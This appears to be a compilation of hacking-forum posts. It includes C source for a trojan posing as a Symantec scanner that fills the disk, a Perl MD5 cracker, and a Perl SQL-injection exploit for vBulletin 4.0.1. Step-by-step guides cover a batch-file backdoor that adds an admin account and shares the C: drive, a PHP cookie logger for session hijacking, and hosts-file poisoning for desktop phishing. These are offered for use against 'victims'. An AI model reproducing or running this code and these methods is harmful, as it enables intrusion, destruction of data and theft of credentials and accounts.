char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
sleep(3);
gotoxy(12,8);
delline();
cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}

MD5 Cracker [perl]

Code:
#!/usr/bin/perl
use Digest::MD5 qw( md5_hex );
use LWP::UserAgent;
use HTTP::Request::Common;

print "MD5 Hash ToolKit [mr.pr0n]";

#*************************** [Main Menu] ******************************
menu:;
print "\nMenu:\n";
print " 1. Create your MD5 Hash. \n";
print " 2. Crack your MD5 Hash with Dictionary Attack.\n";
print " 3. Crack your MD5 Hash with Brute Force Attack.\n";
print " 4. Search for your MD5 Hash.\n";
print " 5. Exit.\n";
print "\nOption: ";
$option=;

if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5)
{
print "Oups!Wrong Option!!\n";
goto menu;
}
# Epilogh Option
if ($option==1)
{&create_md5}
if ($option==2)
{&dic_attack}
if ($option==3)
{&brute_attack}
if ($option==4)
{&search_md5}
if ($option==5)
{&quit}

#****************************** [Option 1] ******************************
sub create_md5
{
$word;
print "MD5 Hash Creator\n";
print "Give me your word: ";
$word = ;
chomp($word);
print "MD5 Hash is: ", md5_hex("$word"), "\n\n";
goto menu;
}
#****************************** [Option 2] ******************************
sub dic_attack
{
print "MD5 [Worldlist] Cracker [mr.pr0n]\n";
print "Enter MD5: ";
chomp($hash = );
if(length($hash)!=32)
{
die "$hash is NOT valid\n";
}
$words="passes.txt";
open (WORDLIST, $words);
print "Wordlist opened successfully!\n";
   @wordlist = ;
   for ($i = 0; $i < @wordlist; $i++){
      $h = $wordlist[$i];
       chomp($h);
        $dec=md5_hex($h);
       if($dec eq $hash){
         die "[+]Your password is: $h\n";}
}
print "[-]Not Cracked!!\n";
goto menu;
}
#****************************** [Option 3] ******************************
sub brute_attack
{
$min=1;
$max=10;
print "MD5 [BruteForce] Cracker [mr.pr0n]\n";
print "Enter Type: ";
chomp($type = );
if ($type=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($type=~"A") {
$alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($type=~"1") {
$alpha = $alpha."1234567890";}
if ($type=~"!") {
$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}
print "Enter MD5: ";
chomp($md5 = );
if(length($md5)!=32)
{die "$md5 is NOT valid\n";}
for ($j=1; $j<=10; $j++)
{mainbrute ($j);}
sub mainbrute
{
$CharSet = shift;
@RawString = ();
for ($i =0;$i<$CharSet;$i++){ $Brute[i] = 0;}
do{
for ($i =0; $i<$CharSet; $i++){
if ($Brute[$i] > length($alpha)-1){
if ($i==$CharSet-1){
print "�?h Shit!\nNo Results with type '$type' and $Chars chars.\n";
$try=0;
return false;
}
$Brute[$i+1]++;
$Brute[$i]=0;
}}
$pass = "";
for ($i =0;$i<$CharSet;$i++)
{
$pass = $pass . substr($alpha,$Brute[$i],1);
}
$hash = md5_hex($pass);
$try++;
print "$hash ($pass)\n";
if ($md5 eq $hash)
{
print "\n**FOUND PASSWORD** [ $pass ]\nTried $try passwords \n";
goto menu;
}
$Brute[0]++;
}while($Brute[$CharSet-1]
}
goto menu;
}
#****************************** [Option 4] ******************************
sub search_md5
{
print "Search for your MD5 Hash\n";
print "(�?atch your MD5 hash with six most famous online databases)";
print "\nEnter MD5: ";
chomp($hash = );
if(length($hash)!=32)
{
die "$hash is NOT valid\n";
}
$lwp = LWP::UserAgent->new;

#**** [md5oogle]****
$crack = "http://www.md5oogle.com/decrypt.php?input=$hash&meta=01";
$request = $lwp->request(HTTP::Request->new(GET=>$crack));
$c = $request->content =~ /Result: (.*?)<\/b>/;
if ($c) {
print "[md5oogle] Password: $1\n";
} else {

#**** [md5decrypter]****
$url = 'http://www.md5decrypter.com/index.php';
$response = LWP::UserAgent->new->post( $url, [ "hash" => $hash ] );
die "$url error: ", $response->status_line
unless $response->is_success;
die "Weird content type at $url -- ", $response->content_type
unless $response->content_type eq 'text/html';
if( $response->content =~ /Normal Text: <\/b>(.+)/ ) {
print "[md5Decrypter] Password: $1\n";
} else {

#**** [passcracking]****
$url = 'http://passcracking.ru/index.php';
$response = LWP::UserAgent->new->post( $url, [ "datafromuser" => $hash ] );
die "$url error: ", $response->status_line
unless $response->is_success;
die "Weird content type at $url -- ", $response->content_type
unless $response->content_type eq 'text/html';
if( $response->content =~ /(.+)<\/td>/ ) {
print "[PassCracking] Password: $1\n";
} else {

#**** [hashchecker] ****
$url = 'http://www.hashchecker.com/index.php';
$response = LWP::UserAgent->new->post( $url, [ "search_field" => $hash ] );
die "$url error: ", $response->status_line
unless $response->is_success;
die "Weird content type at $url -- ", $response->content_type
unless $response->content_type eq 'text/html';
if( $response->content =~ /

  • $hash is (.+)<\/b>/ ) {
    print "[HashChecker] Password: $1\n";
    } else {

    #**** [Milw0rm] ****
    $ua = $lwp->request(POST 'http://www.milw0rm.com/cracker/search.php',
    [ hash => "$hash", Submit => 'Submit', ] );
    @content = split(/[n]/, $ua->content);
    @password = split( /[><]/, $content[47]);
    if($password[1]) {
    print "[Milw0rm] Password: $password[1]\n";
    }else {

    #**** [GdataOnline] ****
    $gdo = $lwp->request(GET 'http://gdataonline.com/qkhash.php?mode=xml&hash='.$hash);
    @content = split(//, $gdo->content);
    @password = split( /[><]/, $content[1]);
    if(@password[0]) {
    print "[GdataOnline] Password: $password[0]\n";
    }
    else { print " Password Not Found!!"; }
    }}}}}
    goto menu;
    }
    #****************************** [Option 5] ******************************
    sub quit
    {
    exit(1);
    }
    #****************************** [The End] *******************************

  •  
     
     
     
     
     
     
     
     
     
    Save it as anything.pl
    You must have Active Perl installed. Google it Smile
    Go to CMD and type:
    cd [place where it is saved]
    ex. cd Desktop
    then: perl anything.pl

    [Image: wooo.jpg]

    DLL Hijacking Tool



    Hi Everyone,

    Check out this: http://securityxploded.com/dllhijackauditor.php

    This is a very simple and easy tool to find DLL Hijacking Vuln. (which recently became very popular) in your 32 Bit Applications. Although, DLL Hijacking is not very useful since user action is required plus Exploit needs to be put in an DLL File and transferred.

    Try a few applications and I am sure you'll find something.[/align]

    vBulletin 4.0.1 hack

    vBulletin 4.0.1 hack
    Ahhh found a SQL vulnerability in vBulletin 4.0.1 ... works on many forums i tried on which r not patchd Tongue ... Wink ...

    but cracking da md5 is a painnnn ...grrrrrr

    Quote:#!/usr/bin/perl

    use IO::Socket;


    print q{
    #######################################################################
    # vBulletin Version 4.0.1 Remote SQL Injection Exploit #
    # Dork: Powered by vBulletin Version 4.0.1 #
    #######################################################################
    };

    if (!$ARGV[2]) {

    print q{
    Usage: perl VB4.0.1.pl host /directory/ victim_userid

    perl VB4.0.1.pl http://www.vbulletin.com /forum/ 1


    };

    }


    $server = $ARGV[0];
    $dir = $ARGV[1];
    $user = $ARGV[2];
    $myuser = $ARGV[3];
    $mypass = $ARGV[4];
    $myid = $ARGV[5];

    print "------------------------------------------------------------------------------------------------\r\n";
    print "[>] SERVER: $server\r\n";
    print "[>] DIR: $dir\r\n";
    print "[>] USERID: $user\r\n";
    print "------------------------------------------------------------------------------------------------\r\n\r\n";

    $server =~ s/(http:\/\/)//eg;

    $path = $dir;
    $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ​ ​ ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;


    print "[~] PREPARE TO CONNECT...\r\n";

    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

    print "[+] CONNECTED\r\n";
    print "[~] SENDING QUERY...\r\n";
    print $socket "GET $path HTTP/1.1\r\n";
    print $socket "Host: $server\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\r\n";
    print "[+] DONE!\r\n\r\n";



    print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
    while ($answer = <$socket>)
    {

    if ($answer =~/(\w{32})/)
    {

    if ($1 ne 0) {
    print "Password is: ".$1."\r\n";
    print "--------------------------------------------------------------------------------------\r\n";

    }
    exit();
    }

    }
    print "------------------------------------------------------------------------------------------------\r\n";


    well i myself dint find out this exploit.. n respct da oneZ who found it.... but hey... it wrksZZz sooo dun care much Tongue

    Making your own trojan in a .bat file



    Open a dos prompt we will only need a dos prompt , and windows xp…

    -Basics-
    Opening a dos prompt -> Go to start and then execute and write
    cmd and press ok

    Now insert this command: net
    And you will get something like this

    NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
    HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
    SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

    Ok in this tutorial we well use 3 of the commands listed here
    they are: net user , net share and net send

    We will select some of those commands and put them on a .bat file.

    What is a .bat file?
    Bat file is a piece of text that windows will execute as commands.
    Open notepad and whrite there:

    dir
    pause

    And now save this as test.bat and execute it.
    Funny aint it ?

    ———————- Starting ——————-
    -:Server:-
    The plan here is to share the C: drive and make a new user
    with administrators access

    Step one -> Open a dos prompt and a notebook
    The dos prompt will help you to test if the commands are ok
    and the notebook will be used to make the .bat file.

    Command n 1-> net user neo /add
    What does this do? It makes a new user called neo you can put
    any name you whant

    Command n 2-> net localgroup administrators neo /add
    This is the command that make your user go to the administrators
    group.
    Depending on the windows version the name will be different.
    If you got an american version the name for the group is Administrators
    and for the portuguese version is administradores so it’s nice
    yo know wich version of windows xp you are going to try share.

    Command n 3->net share system=C:\ /unlimited
    This commands share the C: drive with the name of system.

    Nice and those are the 3 commands that you will need to put on your
    .bat file and send to your friend.

    -!extras!-
    Command n 4-> net send urip I am ur server
    Where it says urip you will insert your ip and when the victim
    opens the .bat it will send a message to your computer
    and you can check the victim ip.

    ->To see your ip in the dos prompt put this command: ipconfig

    ———————–: Client :—————-
    Now that your friend opened your .bat file her system have the
    C: drive shared and a new administrator user.
    First we need to make a session with the remote computer with
    the net use command , you will execute these commands from your
    dos prompt.

    Command n 1 -> net use \\victimip neo
    This command will make a session between you and the victim
    Of course where it says victimip you will insert the victim ip.
    Command n 2-> explorer \\victimip\system
    And this will open a explorer windows in the share system wich is
    the C: drive with administrators access!

    SESSION HIJACKING TUTORIAL -STEP BY STEP

    SESSION HIJACKING TUTORIAL
    Session hijacking:

    Session hijacking is the process of exploiting valid computer session which involves stealing the victim's cookie.

    so now,let's understand the below.

    What is a cookie?

    A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
    A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
    Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

    What can we do after stealing cookie?

    Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

    The following is a cookie stealing script which is to be stored in attacker's host.It recieves the cookie data and stores to a text file.

    PHP Code:


    function GetIP()
    {
    if (
    getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))$ip getenv("HTTP_CLIENT_IP");
    else if (
    getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))$ip getenv("HTTP_X_FORWARDED_FOR");
    else if (
    getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))$ip getenv("REMOTE_ADDR");
    else if (isset(
    $_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))$ip $_SERVER['REMOTE_ADDR'];
    else
    $ip "unknown";
    return(
    $ip);
    }

    function 
    logData()
    {
    $ipLog="log.txt";$cookie $_SERVER['QUERY_STRING'];$register_globals = (bool) ini_get('register_gobals');
    if (
    $register_globals$ip getenv('REMOTE_ADDR');
    else 
    $ip GetIP();
    $rem_port $_SERVER['REMOTE_PORT'];$user_agent $_SERVER['HTTP_USER_AGENT'];$rqst_method $_SERVER['METHOD'];$rem_host $_SERVER['REMOTE_HOST'];$referer $_SERVER['HTTP_REFERER'];$date=date ("l dS of F Y h:i:s A");$log=fopen("$ipLog""a+");

    if (
    preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog))fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
    "
    );
    else
    fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");fclose($log);
    }
    logData();
    ?>

    Save the script as a cookielogger.php in your server.(Any free web hosting sites like justfree,x10hosting etc..)
    Also create an empty text file and name it as log.txt and upload it.

    Now we come to the hardest part where we have to inject a piece of javascript into sites html page,which the victims has to visit.We should now look for a place to post the javascript.

    Look for user interactive sites which contain comments or forums.

    Post the following code which invokes or activates the cookielogger on your host.

    Code:

    Your can also trick the victim into clicking a link that activates javascript.
    Below is the code which has to be posted.


    Clicking an image also can activate the script.For this purpose you can use the below code.

    Code:

    All the details like cookie,ipaddress,browser of the victim are logged in to log.txt in your host.

    In the above codes please remove the space in between javascript.

    Hijacking the Session:

    Now we have cookie,what to do with this..?
    Download cookie editor mozilla plugin.

    Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account.
    Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

    Don't forget to add rep if you like my post.

    Tuesday, May 3, 2011

    MONITOR YOUR EMPLOYEES & STUDENT

    Hello Hackers Club Members !!!!
    Today I'm going to tell you how to monitor activities of our Student / Employees.
    This Software is dedicated for the Administrator/Owner of any Training Institiute or Company to Monitor the activities of their Employees or Students.



    Net Monitor for Employees Professional allows you to see screens of computers connected to the network. This way you can observe what your employees are doing! Additionally, you have the ability to take control of a remote computer by
    controlling the mouse and keyboard. You can record remote computers screens even when you are not monitoring them. When your employees need instructions, you can show them your desktop. To increase your efficiency the console now include several tolls that can be executed on all or just selected remote computers. When you need attention you can send a message to employees and/or lock the remote computer.





    What are the major benefits of using Net Monitor for Employees Professional ?

    *   For monitoring and recording your employees activities on a remote computers
      For preventing internet browsing on remote computers
      For starting and stopping applications and processes on remote computers.
    *   For monitoring students in the classroom to achieve better discipline or, just to assist them when they are in trouble (by using the remote control feature).
    *   For administrating all computers just from one location – your computer.
    *   For presenting your screen to students.
    *   For locking students computers while they are waiting for further instructions or assignments.
    *   Helping your students by showing your desktop to them.
    *   Turning off, restarting, .... remote computers with one click.
    *   Schedule remote computers desktop recording to AVI files
    *   Execute several actions on all remote computers with on click
    *   Block internet access

    Enjoy With Us....
    Share your Ideas...

    Desktop Phishing Tutorial - Step By Step Explained

     It is an advance form of phishing. Kindly read my previous post on normal phishing herebefore proceeding.Difference between phishing and desktop phishing is as follows.

    In phishing :-

    1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.


    2.Victim enters his credentials in fake login page that goes to attacker.
    3.Victim is then redirected to an error page or genuine website depending on attacker.

    But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

    In desktop phishing:-
    1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
    2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
    3. Rest of the things are same as in normal phishing.


    What is Hosts File ?

    The hosts file  is a text file containing domain names and IP address associated with them Location of hosts file in windows: C:\Windows\System32\drivers\etc\ 
    Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

    Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
    be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

    What is attack ?
    I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

    Two Steps to perform attack :-
    1. Create and host phishing page on your computer.
    2. Modify victim's host file

    Step 1 -:

    Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.

    Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.


    Step 2. This  step can performed in two different ways. 

    Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

    Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

    Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc  and victim's hosts file get replaced by our modified hosts file.






    Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

    Method 2 - Create a batch file which would modify hosts file as per your need.
    Open your notepad and type the following text

    echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts

    echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 


    Obviously replace it with your IP and website acc. to yourself.



    Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 
    When victim would run this file, a new entry will be made in hosts file.

    You can test both the above methods to modify your own hosts file

    Limitations of attack :-
    1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
    2. The browser may warn the victim that Digital Certificate of the website is not genuine.

    Countermeasures:-
    Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure